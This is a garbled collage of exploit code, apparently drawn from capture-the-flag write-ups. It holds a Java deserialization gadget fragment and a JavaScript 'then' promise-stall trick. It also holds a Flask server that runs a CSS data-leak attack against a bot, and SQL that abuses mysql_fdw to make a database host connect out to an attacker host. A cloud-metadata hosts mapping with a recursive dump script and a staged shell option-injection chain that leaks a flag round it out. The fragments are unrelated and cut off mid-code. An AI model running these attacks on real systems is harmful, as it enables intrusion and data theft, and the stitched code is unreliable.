publicclassPoc{ publicstaticvoidmain(String[] args)throws Exception{ ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos);
Constructor con = InvokerTransformer.class.getDeclaredConstructor(String.class); con.setAccessible(true); // need a public method InvokerTransformer transformer = (InvokerTransformer) con.newInstance("connect");
What if line 2 is executed but line 3 is NEVER executed? It is possible.
In line 2, we are awaiting the execution of the setRoutes function. Recall that async/await in ECMAScript is just syntactic sugar over Promises, so we can transform this function into the following equivalent code.
The key is that the code is calling the chained method then() on the value returned by setRoutes. What is the return value of this function?
It is returning the result of session.routes. This return is unnecessary, since the assignment to session.routes has already been done.
Okay, we can control this value via the salt parameter. What if we set salt = 'then'? It will return the following object.
>{ // redacted then: () => salt, >}
As you can infer from the above code, this then method will be called with a callback function as its argument. If that callback is invoked, the promise is treated as resolved and the process continues. But this then() method simply ignores its argument, so the callback is never invoked and the promise never settles.
So, by setting salt = 'then', the assignment to session.routes happens inside setRoutes, but the promise returned from setRoutes never resolves, and the assignment to session.salt never happens.
So, send GET /?action=SetSalt&data=then to the server; this will leave the session in the following state.
// Post is the persisted row for a note. GORM maps each field to the column
// named in its tag: ID is the primary key, the remaining fields carry explicit
// column names.
type Post struct {
	ID          string    `gorm:"primaryKey"`
	UID         string    `gorm:"column:uid"` // presumably the owning user's id; confirm against the handlers that set it
	Title       string    `gorm:"column:title"`
	Description string    `gorm:"column:description"`
	CreatedAt   time.Time `gorm:"column:created_at"` // GORM's conventional creation-timestamp field name
}
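// Open the on-disk SQLite database and make sure the Post table exists.
// Both steps are fatal on failure: a server that starts without a usable
// schema would only fail later, on the first query.
db, err := gorm.Open(sqlite.Open("database.db"), &gorm.Config{})
if err != nil {
	log.Fatalf("failed to open a database: %s", err.Error())
}
// AutoMigrate returns an error as well (read-only file, conflicting schema,
// ...); the original discarded it, so a failed migration surfaced only as
// confusing errors on later queries instead of at startup.
if err := db.AutoMigrate(&Post{}); err != nil {
	log.Fatalf("failed to migrate schema: %s", err.Error())
}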
@app.route("/start")
def start():
    """Kick off the leak: post a note carrying the first-stage payload and
    hand it to the bot.

    The payload is built with an empty leaked prefix (nothing known yet)
    over ``CHAR_CANDIDATES``; the note id returned by ``post_note`` is then
    reported so the bot loads it as a stylesheet. The HTTP response body is
    intentionally empty -- the useful output is the console line.
    """
    payload = build_payload("", CHAR_CANDIDATES)
    note_id = post_note("exploit", payload)
    report_note_as_stylesheet(note_id)
    print(f"[info]: started exploit with a new note: {TARGET_BASE}/notes/{note_id}")
    return ""
p = build_payload(leaked_id, CHAR_CANDIDATES) exploit_id = post_note("exploit", p) report_note_as_stylesheet(exploit_id) print("[info]: invoked crawler with a new note: " + exploit_id) return""
if __name__ == "__main__":
    print("[info] running app ...")
    # Bind on every interface: the target's bot has to reach this callback
    # server from outside, so a loopback-only bind would not work. Anything
    # else on the network can reach it too -- run it only for the exploit.
    app.run(port=1337, host="0.0.0.0")
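-- Abuse of mysql_fdw from a PostgreSQL session: every statement runs on the
-- database server, so the outbound TCP connection to the listed host/port is
-- made by the database host itself, with the credentials from the user
-- mapping. Creating servers and user mappings is normally a privileged
-- operation; the listed host and port are the attacker's listener.
-- (The original listing was missing the statement terminators and the
-- spaces between option names and values; both are restored here.)
CREATE SERVER q FOREIGN DATA WRAPPER mysql_fdw OPTIONS (host 'ccreater.top', port '63306');
CREATE USER MAPPING FOR realuser SERVER q OPTIONS (username 'a', password 'a');
CREATE FOREIGN TABLE c (id int) SERVER q OPTIONS (dbname 'a', table_name 'a');
-- The SELECT is what actually triggers the connection to the remote host.
SELECT * FROM c;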
if ( ( ( '#NONE#' !== $metakeyselect ) && ! empty( $metakeyselect ) ) || ! empty( $metakeyinput ) ) { /* * We have a key/value pair. If both the select and the input * for the key have data, the input takes precedence. */ if ( '#NONE#' !== $metakeyselect ) { $metakey = $metakeyselect; }
# /etc/hosts: Local Host Database # # This file describes a number of aliases-to-address mappings for the # local hosts that share this file. # # In the presence of the domain name service or NIS, this file may not be # consulted at all; see /etc/host.conf for the resolution order. #
# IPv4 and IPv6 localhost aliases 127.0.0.1 localhost ::1 localhost
# # Imaginary network. #10.0.0.2 myname #10.0.0.3 myfriend # # According to RFC 1918, you can use the following IP networks for private # nets which will never be connected to the Internet: # # 10.0.0.0 - 10.255.255.255 # 172.16.0.0 - 172.31.255.255 # 192.168.0.0 - 192.168.255.255 # # In case you want to be able to connect directly to the Internet (i.e. not # behind a NAT, ADSL router, etc...), you need real official assigned # numbers. Do not try to invent your own network numbers but instead get one # from your network provider (if any) or from your regional registry (ARIN, # APNIC, LACNIC, RIPE NCC, or AfriNIC.) # 169.254.169.254 metadata.google.internal metadata
def getInfo(parent, path):
    """Recursively dump a listing tree reachable through ``req``.

    Fetches ``parent + path``; on a 500 the node is treated as absent and
    nothing is printed. Otherwise the full path, the response body and a
    separator are echoed, and -- only when ``path`` ends in ``/`` -- each
    line of the body is taken as a child name and fetched the same way
    beneath ``parent + path``. There is no cycle guard or depth limit, so
    a listing that (directly or indirectly) names itself would recurse
    until the interpreter's recursion limit.
    """
    response = req(parent, path)
    if response.status_code == 500:
        return
    full_path = parent + path
    for line in (full_path, response.text, "----------------------------------------------------------------------"):
        print(line)
    if not path.endswith("/"):
        return
    # A trailing slash marks a directory: every body line is a child entry.
    for entry in response.text.splitlines():
        getInfo(full_path, entry)
if __name__ == "__main__":
    # Option-injection chain: the app hands user-controlled `args` to shell
    # utilities, and directory names it created earlier are accepted back as
    # arguments, so a directory named like an option (`--output=...`,
    # `--files0-from=...`) becomes that option.

    def _create(sess, args):
        # The "create playlist" action runs mkdir with our arguments.
        req(sess, "/?args=" + args + "&op=create")

    # ---- stage 1: get `/flag/\0` written into a file we choose ----
    s1 = requests.Session()
    resp = req(s1, "/")  # establish a session
    # `mkdir -p ./--output=/tmp/vakzz_in` and `mkdir ./-z`: both names must
    # exist so the later `ls` succeeds and the strings are accepted as args.
    _create(s1, "-p ./--output=/tmp/vakzz_in")
    _create(s1, "./-z")
    # `--` stops ls from treating what follows as options; everything after
    # it exists, so ls exits cleanly and the args are added to the queue:
    #   ls -- -z --output=/tmp/vakzz_in /flag/
    req(s1, "/q/add?args=-- -z --output=/tmp/vakzz_in /flag/")
    # Drop the `--` from the queue so the next tool sees the real options.
    req(s1, "/q/skip")
    # Shuffling runs `shuf -e -z --output=/tmp/vakzz_in /flag/`, which writes
    # its last argument NUL-terminated into the output file.
    req(s1, "/q/shuf")
    # /tmp/vakzz_in now holds `/flag/\x00`.

    # Rate limit on the target; a fresh session is also needed for more
    # playlists.
    time.sleep(10)

    # ---- stage 2: make du read that file and leak one character class ----
    s2 = requests.Session()
    resp = req(s2, "/")
    _create(s2, "-p ./--files0-from=/tmp/vakzz_in")
    _create(s2, "./--exclude=flag?[1-9]*")
    # Both names are now in the names array and usable as args. `stat` runs
    #   du -sh --files0-from=/tmp/vakzz_in --exclude=flag?[1-9]*
    # i.e. du sizes /flag/ while excluding entries matching the glob.
    resp = req(s2, "/?args=--files0-from=/tmp/vakzz_in --exclude=flag?[1-9]*&op=stat")
    # Size oracle: `8.0K /flag/` when the flag file was excluded (the
    # character after `flag?` is 1-9), `16K /flag/` otherwise. The parse
    # below assumes the third `field-row` label holds that size and will
    # raise IndexError if the page layout differs.
    label_marker = '<div class="field-row"><label>'
    size_cell = resp.text.split(label_marker)[2]
    print(size_cell.split(" ")[0])
from flask import Flask, render_template, request, flash, redirect, send_file,session,render_template_string import os import re from hashlib import md5 import yaml